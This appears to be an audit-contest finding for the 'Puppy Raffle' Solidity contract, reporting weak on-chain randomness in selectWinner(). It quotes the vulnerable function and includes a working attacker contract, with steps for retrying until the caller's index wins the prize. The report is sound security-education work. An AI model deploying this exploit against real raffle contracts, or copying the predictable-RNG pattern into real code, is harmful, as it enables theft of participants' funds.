First Flight #2: Puppy Raffle

First Flight #2

Beginner FriendlyFoundryNFT

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

`winnerIndex` and `rarity` can be know before calling `selectWinner()`. This allows caller to choose the winner and steal the prize.

naman1729

Summary

we have a contract given below which allows the attacker to know the winnerIndex before calling selectWinner(). This allows the attacker to choose the winner and steal the prize. Similarly, the attacker can also know the rarity before calling selectWinner().

Vulnerability Details

Click this to see Code

/// @notice this function will select a winner and mint a puppy

/// @notice there must be at least 4 players, and the duration has occurred

/// @notice the previous winner is stored in the previousWinner variable

/// @dev we use a hash of on-chain data to generate the random numbers

/// @dev we reset the active players array after the winner is selected

/// @dev we send 80% of the funds to the winner, the other 20% goes to the feeAddress

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

uint256 winnerIndex =

@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

address winner = players[winnerIndex];

uint256 totalAmountCollected = players.length * entranceFee;

uint256 prizePool = (totalAmountCollected * 80) / 100;

uint256 fee = (totalAmountCollected * 20) / 100;

totalFees = totalFees + uint64(fee);

uint256 tokenId = totalSupply();

// We use a different RNG calculate from the winnerIndex to determine rarity

@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

if (rarity <= COMMON_RARITY) {

tokenIdToRarity[tokenId] = COMMON_RARITY;

} else if (rarity <= COMMON_RARITY + RARE_RARITY) {

tokenIdToRarity[tokenId] = RARE_RARITY;

} else {

tokenIdToRarity[tokenId] = LEGENDARY_RARITY;

}

delete players;

raffleStartTime = block.timestamp;

previousWinner = winner;

(bool success,) = winner.call{value: prizePool}("");

require(success, "PuppyRaffle: Failed to send prize pool to winner");

_safeMint(winner, tokenId);

}

this line uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length; allows the caller to know the winnerIndex after entering in block and before calling selectWinner().

Click this to see Attack Code

// SPDX-License-Identifier: MIT

pragma solidity 0.8.18;

interface PuppyRaffle {

function selectWinner() external;

}

contract Attack {

PuppyRaffle public puppyRaffle;

uint256 public playerSize;

uint256 public myIndex;

uint256 public currentWinner;

error Attack__NotsuccessFull();

constructor(address addr) {

puppyRaffle = PuppyRaffle(addr);

}

function setPlayerSize(uint256 size, uint256 index) public {

playerSize = size;

myIndex = index;

}

function _attack() public {

currentWinner = uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))) % playerSize;

if (currentWinner != myIndex) {

revert Attack__NotsuccessFull();

}

puppyRaffle.selectWinner();

}

The attacker first calls setPlayerSize() to set the player size and his index. Then he calls _attack() to get the winnerIndex and call selectWinner().
We have to call _attack() multiple times if it reverts Attack__NotsuccessFull().
After the metamask popup, we have to confirm the transaction immediately. Otherwise, block.timestamp will change and the winnerIndex will be different.
this is an example transaction: tx you can found in internal transaction section
Similarly, we can also know the rarity before calling selectWinner().

Impact

The attacker can choose the winner and steal the prize.

Tools Used

Manual Review
Remix

Recommendations

We can use Chainlink VRF to generate random numbers for WinnerIndex as well as rarity.

Updates

Lead Judging Commences

Hamiltonite Lead Judge about 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

weak-randomness

Root cause: bad RNG Impact: manipulate winner

Rewards breakdown

nSLOC

143

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!